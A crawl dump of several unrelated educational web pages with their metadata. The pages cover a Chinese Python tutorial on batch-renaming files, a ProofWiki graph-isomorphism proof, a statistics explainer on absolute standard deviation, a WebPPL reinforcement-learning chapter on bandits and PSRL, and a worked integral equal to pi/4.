#指向當前資料夾的路徑\nfind_dir(path)\n``````\n\n(方便之後將檔案放在同一個資料夾做排序)\n\n``````import os\ndef batch_rename(path, prefix):\n# 函數功能: 在指定path路徑下,將該層檔案及資料夾名稱前加上prefix字串\nfor fname in os.listdir(path):\nnew_fname = prefix+fname\nos.rename(os.path.join(path, fname), os.path.join(path, new_fname))\n\nbatch_rename(\"./歌單1\",'a')\nbatch_rename(\"./歌單2\",'b')\nbatch_rename(\"./歌單3\",'c')\n``````\n\n# 附上完整程式碼供參考\n\n``````import os\ndef batch_rename(path, prefix):\n# 函數功能: 在指定path路徑下,將該層檔案及資料夾名稱前加上prefix字串\nfor fname in os.listdir(path):\nnew_fname = prefix+fname\nos.rename(os.path.join(path, fname), os.path.join(path, new_fname))\n\ndef batch_showname(path):\n# 函數功能: 顯示指定路徑下,該層的檔案及資料夾名稱\nfor fname in os.listdir(path):\nprint(os.path.join(path, fname))\n\ndef find_dir(path):\n# 函數功能: 遞迴顯示指定路徑下的所有檔案及資料夾名稱\nfor fd in os.listdir(path):\nfull_path=os.path.join(path,fd)\nif os.path.isdir(full_path):\nprint('資料夾:',full_path)\nfind_dir(full_path)\nelse:\nprint('檔案:',full_path)\n\npath=\"./\" #指向當前資料夾的路徑\nfind_dir(path)\n``````" ]
[ null, "https://ithelp.ithome.com.tw/storage/image/logo.svg", null, "https://ithelp.ithome.com.tw/upload/images/20200123/20117114xLnGtxWTLn.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.5574649,"math_prob":0.61331683,"size":2128,"snap":"2020-10-2020-16","text_gpt3_token_len":1256,"char_repetition_ratio":0.18879473,"word_repetition_ratio":0.4785276,"special_character_ratio":0.24906015,"punctuation_ratio":0.2875318,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95800793,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-26T16:28:10Z\",\"WARC-Record-ID\":\"<urn:uuid:3128cece-7b3f-42f9-9377-6aa0ec86af10>\",\"Content-Length\":\"56191\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a170552f-4a48-46e3-bb03-9275d973bf93>\",\"WARC-Concurrent-To\":\"<urn:uuid:bb46331e-dd36-4ee3-bec0-9c0f88ce799b>\",\"WARC-IP-Address\":\"54.168.55.14\",\"WARC-Target-URI\":\"https://ithelp.ithome.com.tw/articles/10229795?sc=rss.qu\",\"WARC-Payload-Digest\":\"sha1:HC5MGE346CTDVSTN75WGV5H6MXIANHQS\",\"WARC-Block-Digest\":\"sha1:G33DEI4RRUMZKUGFCUGLJCKSTAI56ND3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875146414.42_warc_CC-MAIN-20200226150200-20200226180200-00396.warc.gz\"}"}
https://proofwiki.org/wiki/Isomorphism_Classes_for_Order_4_Size_3_Simple_Graphs
[ "# Isomorphism Classes for Order 4 Size 3 Simple Graphs\n\n## Theorem\n\nThere are $3$ equivalence classes for simple graphs of order $4$ and size $3$ under isomorphism:", null, "## Proof\n\nThe fact that the $3$ graphs given are not isomorphic follows from Vertex Condition for Isomorphic Graphs.\n\nThe vertices have degrees as follows:\n\nGraph $1$: $2, 2, 1, 1$\nGraph $2$: $3, 1, 1, 1$\nGraph $3$: $2, 2, 2, 0$\n\nThe fact that there are no more isomorphism classes of such graphs can be proved constructively.\n\nLet the $4$ vertices be named $A, B, C$ and $D$.\n\nLemma: There must be intersections among the edges.\n\nProof: If there were no intersection at all, it requires at least $3 \\times 2 = 6$ vertices.\n\nWithout loss of generality, let $2$ of the edges be $AB$ and $AC$.\n\nTo place the last edge, there are $\\dbinom 4 2 = 6$ potential choices:\n\n$AB$: this makes the graph not simple\n$AC$: this makes the graph not simple\n$AD$: this is isomorphic to graph $2$\n$BC$: this is isomorphic to graph $3$\n$BD$: this is isomorphic to graph $1$\n$CD$: this is isomorphic to graph $1$.\n\nHence, by Proof by Cases, these $3$ are the only isomorphism classes.\n\n$\\blacksquare$" ]
[ null, "https://proofwiki.org/w/images/thumb/2/2d/Isomorphism-Classes-Order4-Size3-Simple.png/400px-Isomorphism-Classes-Order4-Size3-Simple.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8793899,"math_prob":0.9999244,"size":1916,"snap":"2023-14-2023-23","text_gpt3_token_len":537,"char_repetition_ratio":0.13023013,"word_repetition_ratio":0.1661721,"special_character_ratio":0.28757828,"punctuation_ratio":0.16243654,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999989,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-20T16:32:57Z\",\"WARC-Record-ID\":\"<urn:uuid:d25399c0-3de7-4c91-8453-f06410aee914>\",\"Content-Length\":\"41855\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c9956d10-6cd2-4442-9e71-2e0db7cf36ff>\",\"WARC-Concurrent-To\":\"<urn:uuid:186d811d-7055-4735-ad3b-7c0335108278>\",\"WARC-IP-Address\":\"172.67.198.93\",\"WARC-Target-URI\":\"https://proofwiki.org/wiki/Isomorphism_Classes_for_Order_4_Size_3_Simple_Graphs\",\"WARC-Payload-Digest\":\"sha1:ERK53T6ZHS6YWDQFNFK5GUCJ5Z2QMDBI\",\"WARC-Block-Digest\":\"sha1:JK6ACT4I56D2BA6DA37FRS3QC5TLAHHW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296943484.34_warc_CC-MAIN-20230320144934-20230320174934-00444.warc.gz\"}"}
https://www.statisticshowto.com/absolute-standard-deviation/
[ "# Absolute Standard Deviation: What is it?\n\n## What is Absolute Standard Deviation?", null, "There isn’t a clear definition for the term “absolute standard deviation.” You might sometimes see in a text book, lab notes, lecture notes, or some other in-class materials; the author is usually referring the “traditional” standard deviation. However, it might also refer to error propagation, relative standard deviation, or the absolute deviation.\n\nRead your text or notes and try to figure out which of these the author is talking about. If it’s in lab notes, lecture notes, or some other in-class materials, then ask your instructor to clarify the term.\n\n## Brief Definitions\n\nThese brief definitions might make it clear which term your book/paper is actually talking about. Click on the italicized link at the end of each definition for more information about the term, and how to calculate each term.\n\n• Standard deviation: Standard deviation is a measure of how much your data is spread out. The formula to calculate it by hand is cumbersome, but possible if you follow the directions step-by-step. See: How to calculate the standard deviation.\n• Error propagation: Error propagation (sometimes called propagation of uncertainty) happens when you use uncertain measurements to calculate something else. For example, you might use length to find area. “Propagation” is when these errors grow much more quickly than the sum of the individual errors. Several formulas exist to take calculate these errors. See: Formulas for Error Propagation (Propagation of Uncertainty).\n• Relative standard deviation: The RSD is a special form of the standard deviation. It tells you whether the “regular” std dev is a small or large quantity when compared to the mean for the data set. It’s reported as a positive percentage. See: What is the relative standard deviation?\n• Absolute deviation: the distance between each value in the data set and that data set’s mean or median. See: Average Deviation (Average Absolute Deviation)\n\n## References\n\nGonick, L. (1993). The Cartoon Guide to Statistics. HarperPerennial.\nKotz, S.; et al., eds. (2006), Encyclopedia of Statistical Sciences, Wiley.\nEveritt, B. S.; Skrondal, A. (2010), The Cambridge Dictionary of Statistics, Cambridge University Press.\n\nCITE THIS AS:\nStephanie Glen. \"Absolute Standard Deviation: What is it?\" From StatisticsHowTo.com: Elementary Statistics for the rest of us! https://www.statisticshowto.com/absolute-standard-deviation/" ]
[ null, "https://www.statisticshowto.com/wp-content/uploads/2014/12/what-is-a-variable.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86677206,"math_prob":0.7130387,"size":2212,"snap":"2023-40-2023-50","text_gpt3_token_len":456,"char_repetition_ratio":0.14175725,"word_repetition_ratio":0.023391813,"special_character_ratio":0.2056962,"punctuation_ratio":0.15625,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9862305,"pos_list":[0,1,2],"im_url_duplicate_count":[null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-21T15:46:40Z\",\"WARC-Record-ID\":\"<urn:uuid:396a3131-f03f-48b8-9b1f-4a9e0537cccb>\",\"Content-Length\":\"96646\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ede66b1f-09ae-45fe-b1e6-9bd739522f48>\",\"WARC-Concurrent-To\":\"<urn:uuid:24644aec-a6b2-4863-96f4-894114cf8514>\",\"WARC-IP-Address\":\"172.66.40.136\",\"WARC-Target-URI\":\"https://www.statisticshowto.com/absolute-standard-deviation/\",\"WARC-Payload-Digest\":\"sha1:VO7US4N72XZM4POJUY2UTCRWRDBRPPUN\",\"WARC-Block-Digest\":\"sha1:4NWBHJPBFRQ3S4XNU4L3ZHZHJFGKV5ZI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506028.36_warc_CC-MAIN-20230921141907-20230921171907-00143.warc.gz\"}"}
https://agentmodels.org/chapters/3d-reinforcement-learning.html
[ "# Reinforcement Learning to Learn MDPs\n\n## Introduction\n\nPrevious chapters assumed that the agent already knew the structure of the environment. In MDPs, the agent knows everything about the environment and just needs to compute a good plan. In POMDPs, the agent is ignorant of some hidden state but knows how the environment works given this hidden state. Reinforcement Learning (RL) methods apply when the agent doesn’t know the structure of the environment. For example, suppose the agent faces an unknown MDP. Provided the agent observes the reward/utility of states, RL methods will eventually converge on the optimal policy for the MDP. That is, RL eventually learns the same policy that an agent with full knowledge of the MDP would compute.\n\nRL has been one of the key tools behind recent major breakthroughs in AI, such as defeating humans at Go refp:silver2016mastering and learning to play videogames from only pixel input refp:mnih2015human. This chapter applies RL to learning discrete MDPs. It’s possible to generalize RL techniques to continuous state and action spaces and also to learning POMDPs refp:jaderberg2016reinforcement but that’s beyond the scope of this tutorial.\n\n## Reinforcement Learning for Bandits\n\nThe previous chapter introduced the Multi-Arm Bandit problem. We computed the Bayesian optimal solution to Bandit problems by treating them as POMDPs. Here we apply Reinforcement Learning to Bandits. RL agents won’t perform optimally but they often rapidly converge to the best arm and RL techniques are highly scalable and simple to implement. (In Bandits the agent already knows the structure of the MDP. So Bandits does not showcase the ability of RL to learn a good policy in a complex unknown MDP. We discuss more general RL techniques below).\n\nOutside of this chapter, we use term “utility” (e.g. in the definition of an MDP) rather than “reward”. This chapter follows the convention in Reinforcement Learning of using “reward”.\n\n### Softmax Greedy Agent\n\nThis section introduces an RL agent specialized to Bandit: a “greedy” agent with softmax action noise. The Softmax Greedy agent updates beliefs about the hidden state (the expected rewards for the arms) using Bayesian updates. Yet instead of making sequential plans that balance exploration (e.g. making informative observations) with exploitation (gaining high reward), the Greedy agent takes the action with highest immediate expected return1 (up to softmax noise).\n\nWe measure the agent’s performance on Bernoulli-distributed Bandits by computing the cumulative regret over time. The regret for an action is the difference in expected returns between the action and the objective best action2. In the codebox below, the arms have parameter values (“coin-weights”) of $[0.5,0.6]$ and there are 500 Bandit trials.\n\n///fold:\nvar cumsum = function (xs) {\nvar acf = function (n, acc) { return acc.concat( (acc.length > 0 ? 
acc[acc.length-1] : 0) + n); }\nreturn reduce(acf, [], xs.reverse());\n}\n\n///\n\n// Define Bandit problem\n\n// Pull arm0 or arm1\nvar actions = [0, 1];\n\n// Given a state (a coin-weight p for each arm), sample reward\nvar observeStateAction = function(state, action){\nvar armToCoinWeight = state;\nreturn sample(Bernoulli({p : armToCoinWeight[action]}))\n};\n\n// Greedy agent for Bandits\nvar makeGreedyBanditAgent = function(params) {\nvar priorBelief = params.priorBelief;\n\n// Update belief about coin-weights from observed reward\nvar updateBelief = function(belief, observation, action){\nreturn Infer({ model() {\nvar armToCoinWeight = sample(belief);\ncondition( observation === observeStateAction(armToCoinWeight, action))\nreturn armToCoinWeight;\n}});\n};\n\n// Evaluate arms by expected coin-weight\nvar expectedReward = function(belief, action){\nreturn expectation(Infer( { model() {\nvar armToCoinWeight = sample(belief);\nreturn armToCoinWeight[action];\n}}))\n}\n\n// Choose by softmax over expected reward\nvar act = dp.cache(\nfunction(belief) {\nreturn Infer({ model() {\nvar action = uniformDraw(actions);\nfactor(params.alpha * expectedReward(belief, action))\nreturn action;\n}});\n});\n\nreturn { params, act, updateBelief };\n};\n\n// Run Bandit problem\nvar simulate = function(armToCoinWeight, totalTime, agent) {\nvar act = agent.act;\nvar updateBelief = agent.updateBelief;\nvar priorBelief = agent.params.priorBelief;\n\nvar sampleSequence = function(timeLeft, priorBelief, action) {\nvar observation = (action !== 'noAction') &&\nobserveStateAction(armToCoinWeight, action);\nvar belief = ((action === 'noAction') ? priorBelief :\nupdateBelief(priorBelief, observation, action));\nvar action = sample(act(belief));\n\nreturn (timeLeft === 0) ? [action] :\n[action].concat(sampleSequence(timeLeft-1, belief, action));\n};\nreturn sampleSequence(totalTime, priorBelief, 'noAction');\n};\n\n// Agent params\nvar alpha = 30\nvar priorBelief = Infer({ model () {\nvar p0 = uniformDraw([.1, .3, .5, .6, .7, .9]);\nvar p1 = uniformDraw([.1, .3, .5, .6, .7, .9]);\nreturn { 0:p0, 1:p1};\n} });\n\n// Bandit params\nvar numberTrials = 500;\nvar armToCoinWeight = { 0: 0.5, 1: 0.6 };\n\nvar agent = makeGreedyBanditAgent({alpha, priorBelief});\nvar trajectory = simulate(armToCoinWeight, numberTrials, agent);\n\n// Compare to random agent\nvar randomTrajectory = repeat(\nnumberTrials,\nfunction(){return uniformDraw([0,1]);}\n);\n\n// Compute agent performance\nvar regret = function(arm) {\nvar bestCoinWeight = _.max(_.values(armToCoinWeight))\nreturn bestCoinWeight - armToCoinWeight[arm];\n};\n\nvar trialToRegret = map(regret,trajectory);\nvar trialToRegretRandom = map(regret, randomTrajectory)\nvar ys = cumsum( trialToRegret)\n\nprint('Number of trials: ' + numberTrials);\nprint('Total regret: [GreedyAgent, RandomAgent] ' +\nsum(trialToRegret) + ' ' + sum(trialToRegretRandom))\nprint('Arms pulled: ' + trajectory);\n\nviz.line(_.range(ys.length), ys, {xLabel:'Time', yLabel:'Cumulative regret'});\n\n\nHow well does the Greedy agent do? It does best when the difference between arms is large but does well even when the arms are close. Greedy agents perform well empirically on a wide range of Bandit problems refp:kuleshov2014algorithms and if their noise decays over time they can achieve asymptotic optimality. In contrast to the optimal POMDP agent from the previous chapter, the Greedy Agent scales well in both number of arms and trials.\n\nExercises:\n\n1. 
Modify the code above so that it’s easy to repeatedly run the same agent on the same Bandit problem. Compute the mean and standard deviation of the agent’s total regret averaged over 20 episodes on the Bandit problem above. Use WebPPL’s library functions.\n2. Set the softmax noise to be low. How well does the Greedy Softmax agent do? Explain why. Keeping the noise low, modify the agent’s priors to be overly “optimistic” about the expected reward of each arm (without changing the support of the prior distribution). How does this optimism change the agent’s performance? Explain why. (An optimistic prior assigns a high expected reward to each arm. This idea is known as “optimism in the face of uncertainty” in the RL literature.)\n3. Modify the agent so that the softmax noise is low and the agent has a “bad” prior (i.e. one that assigns a low probability to the truth) that is not optimistic. Will the agent always learn the optimal policy (eventually?) If so, after how many trials is the agent very likely to have learned the optimal policy? (Try to answer this question without doing experiments that take a long time to run.)\n\n### Posterior Sampling\n\nPosterior sampling (or “Thompson sampling”) is the basis for another algorithm for Bandits. This algorithm generalizes to arbitrary discrete MDPs, as we show below. The Posterior-sampling agent updates beliefs using standard Bayesian updates. Before choosing an arm, it draws a sample from its posterior on the arm parameters and then chooses greedily given the sample. In Bandits, this is similar to Softmax Greedy but without the softmax parameter $\\alpha$.\n\nExercise: Implement Posterior Sampling for Bandits by modifying the code above. (You only need to modify the act function.) Compare the performance of Posterior Sampling to Softmax Greedy (using the value for $\\alpha$ in the codebox above). You should vary the armToCoinWeight parameter and the number of arms. Evaluate each agent by computing the mean and standard deviation of rewards averaged over many trials. Which agent is better overall and why?\n\n## RL algorithms for MDPs\n\nThe RL algorithms above are specialized to Bandits and so they aren’t able to learn an arbitrary MDP. We now consider algorithms that can learn any discrete MDP. There are two kinds of RL algorithm:\n\n1. Model-based algorithms learn an explicit representation of the MDP’s transition and reward functions. These representations are used to compute a good policy.\n\n2. Model-free algorithms do not explicitly represent or learn the transition and reward functions. Instead they explicitly represent either a value function (i.e. an estimate of the $Q^*$-function) or a policy.\n\nThe best known RL algorithm is Q-learning, which works both for discrete MDPs and for MDPs with high-dimensional state spaces (where “function approximation” is required). Q-learning is a model-free algorithm that directly learns the expected utility/reward of each action under the optimal policy. We leave as an exercise the implementation of Q-learning in WebPPL. Due to the functional purity of WebPPL, a Bayesian version of Q-learning is more natural and in the spirit of this tutorial. 
See, for example, “Bayesian Q-learning” refp:dearden1998bayesian and this review of Bayesian model-free approaches refp:ghavamzadeh2015bayesian.\n\n### Posterior Sampling Reinforcement Learning (PSRL)\n\nPosterior Sampling Reinforcement Learning (PSRL) is a model-based algorithm that generalizes posterior-sampling for Bandits to discrete, finite-horizon MDPs refp:osband2016posterior. The agent is initialized with a Bayesian prior distribution on the reward function $R$ and transition function $T$. At each episode the agent proceeds as follows:\n\n1. Sample $R$ and $T$ (a “model”) from the distribution. Compute the optimal policy for this model and follow it until the episode ends.\n2. Update the distribution on $R$ and $T$ based on the observations from the episode.\n\nHow does this agent efficiently balance exploration and exploitation to rapidly learn the structure of an MDP? If the agent’s posterior is already concentrated on a single model, the agent will mainly “exploit”. If the agent is uncertain over models, then it will sample various models in turn. For each model, the agent will visit states with high reward on that model and so this leads to exploration. If the states turn out not to have high reward, the agent learns this and updates its beliefs away from the model (and will rarely visit those states again).\n\nThe PSRL agent is simple to implement in our framework. The Bayesian belief-updating re-uses code from the POMDP agent: $R$ and $T$ are treated as latent state and are observed every state transition. Computing the optimal policy for a sampled $R$ and $T$ is equivalent to planning in an MDP and we can re-use our MDP agent code.\n\nWe run the PSRL agent on Gridworld. The agent knows $T$ but does not know $R$. Reward is known to be zero everywhere but a single cell of the grid. The actual MDP is shown in Figure 1, where the time-horizon is 8 steps. The true reward function is specified by the variable trueLatentReward (where the order of the rows is the inverse of the displayed grid). The display shows the agent's trajectory on each episode (where the number of episodes is set to 10).", null, "Figure 1: True latent reward for Gridworld below. 
Agent receives reward 1 in the cell marked “G” and zero elsewhere.\n\n///fold:\n\n// Construct Gridworld (transitions but not rewards)\nvar ___ = ' ';\n\nvar grid = [\n[ ___, ___, '#', ___],\n[ ___, ___, ___, ___],\n[ '#', ___, '#', '#'],\n[ ___, ___, ___, ___]\n];\n\nvar pomdp = makeGridWorldPOMDP({\ngrid,\nstart: [0, 0],\ntotalTime: 8,\ntransitionNoiseProbability: .1\n});\n\nvar transition = pomdp.transition\n\nvar actions = ['l', 'r', 'u', 'd'];\n\nvar utility = function(state, action) {\nvar loc = state.manifestState.loc;\nvar r = state.latentState.rewardGrid[loc][loc];\n\nreturn r;\n};\n\n// Helper function to generate agent prior\nvar getOneHotVector = function(n, i) {\nif (n==0) {\nreturn [];\n} else {\nvar e = 1*(i==0);\nreturn [e].concat(getOneHotVector(n-1, i-1));\n}\n};\n///\n\nvar observeState = function(state) {\nreturn utility(state);\n};\n\nvar makePSRLAgent = function(params, pomdp) {\nvar utility = params.utility;\n\n// belief updating: identical to POMDP agent from Chapter 3c\nvar updateBelief = function(belief, observation, action){\nreturn Infer({ model() {\nvar state = sample(belief);\nvar predictedNextState = transition(state, action);\nvar predictedObservation = observeState(predictedNextState);\ncondition(_.isEqual(predictedObservation, observation));\nreturn predictedNextState;\n}});\n};\n\n// this is the MDP agent from Chapter 3a\nvar act = dp.cache(\nfunction(state) {\nreturn Infer({ model() {\nvar action = uniformDraw(actions);\nvar eu = expectedUtility(state, action);\nfactor(1000 * eu);\nreturn action;\n}});\n});\n\nvar expectedUtility = dp.cache(\nfunction(state, action) {\nreturn expectation(\nInfer({ model() {\nvar u = utility(state, action);\nif (state.manifestState.terminateAfterAction) {\nreturn u;\n} else {\nvar nextState = transition(state, action);\nvar nextAction = sample(act(nextState));\nreturn u + expectedUtility(nextState, nextAction);\n}\n}}));\n});\n\nreturn { params, act, expectedUtility, updateBelief };\n};\n\nvar simulatePSRL = function(startState, agent, numEpisodes) {\nvar act = agent.act;\nvar updateBelief = agent.updateBelief;\nvar priorBelief = agent.params.priorBelief;\n\nvar runSampledModelAndUpdate = function(state, priorBelief, numEpisodesLeft) {\nvar sampledState = sample(priorBelief);\nvar trajectory = simulateEpisode(state, sampledState, priorBelief, 'noAction');\nvar newBelief = trajectory[trajectory.length-1];\nvar newBelief2 = Infer({ model() {\nreturn extend(state, {latentState : sample(newBelief).latentState });\n}});\nvar output = [trajectory];\n\nif (numEpisodesLeft <= 1){\nreturn output;\n} else {\nreturn output.concat(runSampledModelAndUpdate(state, newBelief2,\nnumEpisodesLeft-1));\n}\n};\n\nvar simulateEpisode = function(state, sampledState, priorBelief, action) {\nvar observation = observeState(state);\nvar belief = ((action === 'noAction') ? priorBelief :\nupdateBelief(priorBelief, observation, action));\n\nvar believedState = extend(state, { latentState : sampledState.latentState });\nvar action = sample(act(believedState));\nvar output = [[state, action, belief]];\n\nif (state.manifestState.terminateAfterAction){\nreturn output;\n} else {\nvar nextState = transition(state, action);\nreturn output.concat(simulateEpisode(nextState, sampledState, belief, action));\n}\n};\nreturn runSampledModelAndUpdate(startState, priorBelief, numEpisodes);\n};\n\n// Construct agent's prior. 
The latent state is just the reward function.\n// The \"manifest\" state is the agent's own location.\n\n// Combine manifest (fully observed) state with prior on latent state\nvar getPriorBelief = function(startManifestState, latentStateSampler){\nreturn Infer({ model() {\nreturn {\nmanifestState: startManifestState,\nlatentState: latentStateSampler()};\n}});\n};\n\n// True reward function\nvar trueLatentReward = {\nrewardGrid : [\n[ 0, 0, 0, 0],\n[ 0, 0, 0, 0],\n[ 0, 0, 0, 0],\n[ 0, 0, 0, 1]\n]\n};\n\n// True start state\nvar startState = {\nmanifestState: {\nloc: [0, 0],\nterminateAfterAction: false,\ntimeLeft: 8\n},\nlatentState: trueLatentReward\n};\n\n// Agent prior on reward functions (*getOneHotVector* defined above fold)\nvar latentStateSampler = function() {\nvar flat = getOneHotVector(16, randomInteger(16));\nreturn {\nrewardGrid : [\nflat.slice(0,4),\nflat.slice(4,8),\nflat.slice(8,12),\nflat.slice(12,16) ]\n};\n}\n\nvar priorBelief = getPriorBelief(startState.manifestState, latentStateSampler);\n\n// Build agent (using *pomdp* object defined above fold)\nvar agent = makePSRLAgent({ utility, priorBelief, alpha: 100 }, pomdp);\n\nvar numEpisodes = 10\nvar trajectories = simulatePSRL(startState, agent, numEpisodes);\n\nvar concatAll = function(list) {\nvar inner = function (work, i) {\nif (i < list.length-1) {\nreturn inner(work.concat(list[i]), i+1)\n} else {\nreturn work;\n}\n}\nreturn inner([], 0);\n}\n\nvar badState = [[ { manifestState : { loc : \"break\" } } ]];\n\nvar trajectories = map(function(t) { return t.concat(badState);}, trajectories);\nviz.gridworld(pomdp, {trajectory : concatAll(trajectories)});\n\n\n### Footnotes\n\n1. The standard Epsilon/Softmax Greedy agent from the Bandit literature maintains point estimates for the expected rewards of the arms. In WebPPL it’s natural to use distributions instead. In a later chapter, we will implement a more general Greedy/Myopic agent by extending the POMDP agent.\n\n2. The “regret” is a standard Frequentist metric for performance. Bayesian metrics, which take into account the agent’s priors, are beyond the scope of this chapter." ]
[ null, "https://agentmodels.org/assets/img/3d-gridworld.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7415991,"math_prob":0.97645617,"size":16796,"snap":"2021-21-2021-25","text_gpt3_token_len":4026,"char_repetition_ratio":0.15418056,"word_repetition_ratio":0.046368487,"special_character_ratio":0.24148607,"punctuation_ratio":0.17766324,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98178715,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-15T14:11:43Z\",\"WARC-Record-ID\":\"<urn:uuid:f95f421d-e282-445e-bd5b-fd8516f10a82>\",\"Content-Length\":\"23490\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:162aa548-076b-4f09-8929-07322e091d73>\",\"WARC-Concurrent-To\":\"<urn:uuid:ee2a981f-0a01-4050-bf9e-977892fe56f1>\",\"WARC-IP-Address\":\"104.21.48.117\",\"WARC-Target-URI\":\"https://agentmodels.org/chapters/3d-reinforcement-learning.html\",\"WARC-Payload-Digest\":\"sha1:A7J66HNQGDPQCNCJF654TXBYFUS5B6HM\",\"WARC-Block-Digest\":\"sha1:FRC4CY2OVN6RFQPLGGCTMN25HLFGZXV2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243991370.50_warc_CC-MAIN-20210515131024-20210515161024-00594.warc.gz\"}"}
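The PSRL description in the excerpt above reduces to a short loop: sample a model from the posterior, act optimally under it for one episode, then condition on what was observed. The excerpt's own implementation is the WebPPL code shown there; the sketch below is a hypothetical Python rendering of the same loop, assuming a 4x4 grid with deterministic moves, an 8-step horizon, reward 1 in a single unknown cell, and a uniform prior over the 16 candidate cells. All names (`greedy_policy`, `run_episode`, the grid constants) are illustrative choices, not part of the original code.

```python
import random

# Minimal PSRL sketch (illustrative, not the WebPPL implementation above).
SIZE, HORIZON = 4, 8
TRUE_REWARD_CELL = (3, 3)      # hidden from the agent
START = (0, 0)

def step(cell, action):
    """Deterministic gridworld transition that stays inside the grid."""
    dx, dy = {'l': (-1, 0), 'r': (1, 0), 'u': (0, -1), 'd': (0, 1)}[action]
    x, y = cell
    return (min(max(x + dx, 0), SIZE - 1), min(max(y + dy, 0), SIZE - 1))

def greedy_policy(cell, goal):
    """Optimal policy for the sampled model: walk straight toward its reward cell."""
    if cell[0] != goal[0]:
        return 'r' if goal[0] > cell[0] else 'l'
    return 'd' if goal[1] > cell[1] else 'u'

def run_episode(sampled_goal):
    """Follow the policy that is optimal for the sampled model; log observations."""
    cell, observations = START, []
    for _ in range(HORIZON):
        cell = step(cell, greedy_policy(cell, sampled_goal))
        observations.append((cell, 1 if cell == TRUE_REWARD_CELL else 0))
    return observations

posterior = {(x, y) for x in range(SIZE) for y in range(SIZE)}   # uniform prior

for episode in range(10):
    sampled_goal = random.choice(sorted(posterior))   # 1. sample a model, act optimally
    for cell, reward in run_episode(sampled_goal):    # 2. condition on observations
        if reward == 1:
            posterior = {cell}            # reward found: belief collapses
        else:
            posterior.discard(cell)       # visited a zero-reward cell: rule it out
    print(f"episode {episode}: sampled {sampled_goal}, "
          f"{len(posterior)} candidate reward cells left")
```

With only 16 hypotheses the posterior update is pure elimination: any visited cell that yields zero reward is ruled out, which mirrors the "updates its beliefs away from the model" behaviour described in the excerpt.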
https://socratic.org/questions/int-0-1-1-x-2-1
[ "# int_0^1 1/(x^2+1) = ?\n\nDec 14, 2017\n\n$\frac{\pi}{4}$\n\n#### Explanation:\n\nFirst thing to consider is:\n\n$\int \frac{1}{{x}^{2} + 1} \mathrm{dx}$\n\nMake a substitution:\n\n$x = \tan \theta$\n\n$\implies \mathrm{dx} = {\sec}^{2} \theta$ $d \theta$\n\n$\implies \int \frac{1}{{\tan}^{2} \theta + 1} {\sec}^{2} \theta$ $d \theta$\n\nWe must use the identity:\n\n$1 + {\tan}^{2} x = {\sec}^{2} x$\n\n$\implies \int \frac{{\sec}^{2} \theta}{{\sec}^{2} \theta} d \theta$\n\n$\implies \int d \theta$\n\n$\implies \theta + c$\n\nUse: ${\tan}^{- 1} x = \theta$\n\n$= {\tan}^{- 1} x + c$\n\nNow considering limits from $0$ to $1$\n\n$\implies {\tan}^{- 1} \left(1\right) - {\tan}^{- 1} \left(0\right)$\n\n$\implies \frac{\pi}{4} - 0$\n\n$\implies \frac{\pi}{4}$\n\nDec 14, 2017\n\n$\frac{\pi}{4}$\n\n#### Explanation:\n\n${\int}_{0}^{1} \frac{1}{{x}^{2} + 1} \mathrm{dx}$\n\nwe do this by substitution\n\n$x = \tan u$\n\n$\implies \mathrm{dx} = {\sec}^{2} u \mathrm{du}$\n\nchange of limits\n\n$x = 0 \implies u = {\tan}^{- 1} 0 = 0$\n\n$x = 1 \implies u = {\tan}^{- 1} 1 = \frac{\pi}{4}$\n\nthe integral becomes\n\n${\int}_{0}^{\frac{\pi}{4}} \frac{1}{\cancel{{\tan}^{2} u + 1}} \times \cancel{{\sec}^{2} u} \mathrm{du}$\n\n$= {\int}_{0}^{\frac{\pi}{4}} \mathrm{du} = {\left[u\right]}_{0}^{\frac{\pi}{4}}$\n\n$= \frac{\pi}{4} - 0 = \frac{\pi}{4}$" ]
[ null ]
